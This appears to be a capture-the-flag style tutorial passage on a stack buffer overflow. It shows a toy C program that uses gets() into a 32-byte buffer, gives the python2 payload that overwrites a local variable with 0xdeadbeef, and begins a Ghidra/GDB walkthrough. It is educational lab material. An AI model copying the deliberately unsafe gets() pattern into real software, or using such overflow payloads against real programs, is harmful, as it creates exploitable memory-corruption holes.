🫁02-overwriting_stack_variables_part2

So let's run the binary and try to test out the overflow

let's unhex the output value to understand what happended

let's look at the source code to see what happened

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void do_input(){
    int key = 0x12345678;
    char buffer[32];
    printf("yes? ");
    fflush(stdout);
    gets(buffer);
    if(key == 0xdeadbeef){
        printf("good job!!\n");
        printf("%04x\n", key);
        fflush(stdout);
    }
    else{
        printf("%04x\n", key);
        printf("...\n");
        fflush(stdout);
    }
}

int main(int argc, char* argv[]){
    do_input();
    return 0;
}

we see that we have a 32 size buffer and the key value needs to be equal to 0xdeadbeef but there's no input way of changing this value except of overwriting this

python2 -c 'print 32 * "A" + "deadbeef"'

So i tried overflowing the 32 size buffer with the value deadbeef but it only took the first 4 chars and reversed them

so we do the same thing but reverse the 2 dead to daed ->

ok now is going to be the tricky part, we are going to craft our payload and inject it in overwrite:

python2 -c 'print 32 * "A" + "\xef\xbe\xad\xde"'
python2 -c 'print 32 * "A" + "\xef\xbe\xad\xde"' > payload
./overwrite < payload

"\xef\xbe\xad\xde":

  • This is a string containing four specific byte values, represented in hexadecimal notation. Each \xHH sequence represents a single byte, where HH is the hexadecimal value of the byte.

  • In this case, "\xef\xbe\xad\xde" represents the bytes with hexadecimal values EF, BE, AD, and DE.

The last four characters are non-printable and represent the bytes EF, BE, AD, and DE.

and since the string is reversed it overflows with deadbeef and validates the challenge

Now let's open up ghidra

We can start by changing some of the values to look more like what we had in our C program:

and just like that we see the comparaison that is being made, now let's hop on GDB

let's start with info functions

we then go and disassemble main:

We see do_input that seems interesting, let's disassmble it:

Previous01-overwriting_stack_variables_part1NextC Basics

Last updated